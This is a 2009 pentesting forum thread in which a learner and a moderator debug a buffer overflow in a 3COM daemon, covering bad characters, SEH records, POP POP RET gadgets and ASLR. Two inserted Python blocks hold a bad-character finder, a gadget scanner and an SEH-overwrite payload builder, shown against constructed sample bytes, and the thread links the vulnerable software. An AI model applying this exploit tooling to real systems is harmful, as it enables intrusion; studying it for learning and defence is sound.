Remote Exploit Forums

Pentesting: Specific topics related to legal penetration testing
#21
10-17-2009, 04:50 AM
Lincoln
Senior Member
Join Date: Apr 2008
Posts: 319

Here is an easy-to-read PDF from muts about SEH: http://www.remote-exploit.org/adviso...lobalscape.pdf
__________________
Homer: You don't like your job, you don't strike. You go in every day and do it really half-assed. That's the American way.
#22
10-17-2009, 04:54 AM
Member
Join Date: Oct 2008
Posts: 34

Thanks, that's just what I needed. Just a little question: it seems like 0x00 might be a bad character, but the other POP POP RET I found, which started with 0x77, was in ntdll, so of course... ASLR. Is there any way to bypass ASLR? If not, do I just keep trying to exploit it over and over until it works? lol

Last edited by oib111; 10-17-2009 at 06:33 AM.
#23
10-17-2009, 06:41 AM
lupin
Moderator
Join Date: Mar 2009
Location: Australia
Posts: 945

Quote: Originally Posted by oib111
Now, if the problem persists, it is possible that 0xEB is a bad character, right?

I suppose it's possible, although I don't recall having had \xeb as a bad character myself. You can confirm using the method I specified above (try sending buffers that are otherwise identical except that one contains \xeb instead of something like \x41, and confirm that EIP gets overwritten with an identical value each time).

Quote: Originally Posted by oib111
I don't know much about SEH, but I feel like 0x0feb9090 as the pointer to the next SEH record is causing some problems.

The SEH address is used as an exception handler when a program crashes: execution jumps to that address, which usually points to a function that throws up an error message and closes the program.

If you were to trigger an EIP overwrite in OllyDbg, with EIP being overwritten with something like 42424242, and then you pass that exception to the program, the SEH handler should be called next. In this case the SEH value would matter. However, if you are using an EIP overwrite to redirect execution, with the EIP value set to a valid address that contains valid commands for the CPU to run, then the SEH shouldn't get called.
__________________
Nancy Astor: If I were your wife I would put poison in your coffee!
Winston Churchill: Madam, if I were your husband I would drink it.
#24
10-17-2009, 07:19 AM
Member
Join Date: Oct 2008
Posts: 34
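The bad-character check lupin describes in the post above, as an added example in Python (not code from the thread or from either poster): one function builds the pair of buffers that differ only in the candidate byte, so EIP can be compared between the two runs in the debugger; the other sends a buffer containing every byte value and compares it with what actually landed in memory, removing one mangled byte per round until the whole buffer arrives intact. The `fake_target` function is a constructed stand-in for the service, its mangling rules are assumed for the example, and the offset 120 is made up; against the real target you compare the sent buffer with the stack dump in OllyDbg instead.

```python
import struct

FILLER = b"A"


def fake_target(data: bytes) -> bytes:
    """CONSTRUCTED stand-in for the vulnerable service (an assumption, not the
    3COM daemon): it reads a single line (stops at 0x0a), strips carriage
    returns and, like strcpy, stops copying at 0x00. Against a real target this
    function is replaced by what OllyDbg shows in the stack dump."""
    line = data.split(b"\n", 1)[0].replace(b"\r", b"")
    return line.split(b"\x00", 1)[0]


def badchar_buffer(exclude, prefix_len=16):
    """Filler prefix followed by every byte 0x01..0xff not already known bad.
    The prefix lets you line the memory dump up with the sent buffer."""
    body = bytes(b for b in range(1, 256) if b not in exclude)
    return FILLER * prefix_len + body


def first_divergence(sent, seen):
    """Index of the first byte that did not arrive as sent, or None."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i
    return None


def find_bad_chars(send, prefix_len=16):
    """Iterative hunt: each round drops the first byte that got mangled and
    resends, until the whole buffer lands intact. 0x00 is assumed bad from the
    start, as it was in the thread. Returns bad bytes in discovery order."""
    bad = [0x00]
    while True:
        buf = badchar_buffer(bad, prefix_len)
        i = first_divergence(buf, send(buf))
        if i is None:
            return bad
        if i < prefix_len:
            raise RuntimeError("filler was mangled: wrong protocol or offset")
        bad.append(buf[i])


def eip_probe_pair(offset, candidate, ret=0x41414141, tail=32):
    """lupin's pairwise check for one candidate byte: two buffers identical
    except that the candidate replaces the last filler byte before the EIP
    overwrite. If EIP reads the same `ret` for both runs in the debugger, the
    byte passed through unharmed."""
    overwrite = struct.pack("<I", ret) + FILLER * tail
    baseline = FILLER * offset + overwrite
    variant = FILLER * (offset - 1) + bytes([candidate]) + overwrite
    return baseline, variant


if __name__ == "__main__":
    print("bad bytes:", ["%#04x" % b for b in find_bad_chars(fake_target)])
    a, b = eip_probe_pair(offset=120, candidate=0xEB)   # offset is assumed
    print("buffers differ at:", [i for i in range(len(a)) if a[i] != b[i]])
```

With the constructed target the hunt reports 0x00, 0x0a and 0x0d; the point is the loop, not those values, since a real parser mangles whatever it mangles and the dump is the only authority.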

Oh OK, so I don't have to worry about SEH at all. Also, since 0x00 is a bad character and Windows 7 implements ASLR, how exactly can I jump to the POP POP RET in ntdll? Is there any way to bypass ASLR?
#25
10-17-2009, 07:26 AM
lupin
Moderator
Join Date: Mar 2009
Location: Australia
Posts: 945

Quote: Originally Posted by oib111
Oh OK, so I don't have to worry about SEH at all.

If you can manage to overwrite it you can use it to help make your exploit more stable (if the EIP overwrite crashes the program instead of redirecting execution, for example), but no, you don't HAVE to worry about it if the EIP overwrite works.

Quote: Originally Posted by oib111
Also, since 0x00 is a bad character and Windows 7 implements ASLR, how exactly can I jump to the POP POP RET in ntdll? Is there any way to bypass ASLR?

I haven't had to deal with ASLR myself as yet, so I can't really advise on that. Are you sure you can't find a POP POP RET anywhere else? And can't you try this on Windows XP instead? You probably want to keep things as simple as you can for your first overwrite...
#26
10-17-2009, 07:32 AM
Member
Join Date: Oct 2008
Posts: 34
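The two things the last few posts turn on, finding a POP POP RET whose address contains no bad byte and the SEH record layout lupin described in #23, as an added Python example (editor's code, not from the thread or either poster). The scanner walks raw code bytes at every offset, because the CPU starts wherever the overwritten handler pointer says, and rejects any address whose little-endian bytes hit the bad-byte set; the payload builder lays out junk | nSEH | SEH | shellcode. `SAMPLE_CODE`, `SAMPLE_BASE`, the bad-byte set beyond 0x00 and the offset 10 are constructed for the example, not bytes from any real module. One practitioner's caveat on the ASLR question: Windows 7 only randomizes modules linked with /DYNAMICBASE (the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag in the PE header), so a third-party module built without it still loads at its preferred base, and that is where this scan is worth running.

```python
import struct

BAD = {0x00, 0x0A, 0x0D}   # assumed bad bytes for the example; the thread found 0x00

# Single-byte POP r32 opcodes: 58 eax 59 ecx 5a edx 5b ebx 5d ebp 5e esi 5f edi.
# 5c (pop esp) is left out on purpose: popping into esp moves the stack pointer.
POPS = {0x58, 0x59, 0x5A, 0x5B, 0x5D, 0x5E, 0x5F}
RET = 0xC3

# CONSTRUCTED code bytes standing in for a module's .text section; not taken
# from any real DLL. The base is chosen so that one gadget's address contains
# a bad byte (0x0a) and the other's does not.
SAMPLE_BASE = 0x10101001
SAMPLE_CODE = (
    b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57"  # ordinary prologue, 9 bytes
    + b"\x5e\x5d\xc3"                        # +0x09 pop esi; pop ebp; ret -> 0x1010100a
    + b"\x90" * 6                            # padding
    + b"\x5b\x5e\xc3"                        # +0x12 pop ebx; pop esi; ret -> 0x10101013
    + b"\x5c\x5d\xc3"                        # +0x15 pop esp; pop ebp; ret -> rejected
    + b"\xc9\xc3"                            # leave; ret
)


def has_bad_byte(addr, bad=BAD):
    """True if the little-endian encoding of addr contains a bad byte."""
    return any(b in bad for b in struct.pack("<I", addr))


def find_pop_pop_ret(code, base, bad=BAD):
    """Scan raw code bytes for POP r32 / POP r32 / RET at every offset, not just
    instruction boundaries. Returns only addresses free of bad bytes."""
    hits = []
    for i in range(len(code) - 2):
        if code[i] in POPS and code[i + 1] in POPS and code[i + 2] == RET:
            addr = base + i
            if not has_bad_byte(addr, bad):
                hits.append(addr)
    return hits


def seh_payload(offset_to_nseh, handler, shellcode, bad=BAD):
    """Classic SEH overwrite layout:  junk | nSEH | SEH | shellcode.
    SEH (the handler pointer) gets the POP POP RET address. When the exception
    fires the two POPs discard two dwords and RET lands on the third, which is
    the address of the SEH record itself, i.e. nSEH. nSEH therefore holds a
    short jump (EB 06) over the 4-byte handler pointer into the shellcode."""
    if has_bad_byte(handler, bad):
        raise ValueError("handler %#010x contains a bad byte" % handler)
    nseh = b"\xeb\x06\x90\x90"               # jmp short +6; nop; nop
    return b"A" * offset_to_nseh + nseh + struct.pack("<I", handler) + shellcode


if __name__ == "__main__":
    gadgets = find_pop_pop_ret(SAMPLE_CODE, SAMPLE_BASE)
    print("usable POP POP RET:", ["%#010x" % g for g in gadgets])
    payload = seh_payload(offset_to_nseh=10, handler=gadgets[0], shellcode=b"\xcc" * 4)
    print("payload:", payload.hex())
```

On the sample, the gadget at 0x1010100a is dropped because the address carries 0x0a, and only 0x10101013 survives. For comparison with the value quoted earlier in the thread, 0x0feb9090 read as the four bytes in memory is 90 90 EB 0F: two NOPs followed by JMP SHORT +0x0f, which is the same short-jump idea as the nSEH built here, just with the NOPs in front of the jump rather than behind it.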

Well it seems that the POP POP RETs that don't start with 0x00 are in DLLs so ASLR will always be a problem there. I might do some googling on ASLR bypass, but if not I will just do this on XP.

EDIT:

Trying this on XP but I'm having some problems.

[screenshot not preserved in this copy]

I think I'm overwriting the pointer to the next SEH record or the SEH handler or something, and so it jumps to a random place in the program and can't fix the exception, hence the "Debugged program was unable to process exception."

Last edited by oib111; 10-17-2009 at 06:35 PM.
#27
10-20-2009, 08:45 AM
lupin
Moderator
Join Date: Mar 2009
Location: Australia
Posts: 945

Quote: Originally Posted by oib111
Trying this on XP but I'm having some problems.

I think I'm overwriting the pointer to the next SEH record or the SEH handler or something, and so it jumps to a random place in the program and can't fix the exception, hence the "Debugged program was unable to process exception."

Does that happen when you are feeding the program a simple buffer of all '\x41'?
#28
10-21-2009, 01:57 AM
Member
Join Date: Oct 2008
Posts: 34

No, because then EIP isn't valid and it just crashes.
#29
10-21-2009, 04:20 AM
lupin
Moderator
Join Date: Mar 2009
Location: Australia
Posts: 945

Quote: Originally Posted by oib111
No, because then EIP isn't valid and it just crashes.

Can you overwrite EIP with a value you can control? If you can control EIP, then the value of SEH doesn't matter.

What particular piece of 3COM software are you using for this, and how are you triggering the overflow? Download link? I may try and reproduce it myself if I have a spare moment, because I've been keen to do another buffer overflow for a while but haven't found a good candidate...
#30
10-21-2009, 04:27 AM
Member
Join Date: Oct 2008
Posts: 34

Here's a download link: https://www.securinfos.info/old_soft...aemon_2r10.exe

Also, if I overwrite EIP with a valid return address, that happens (what's in the picture).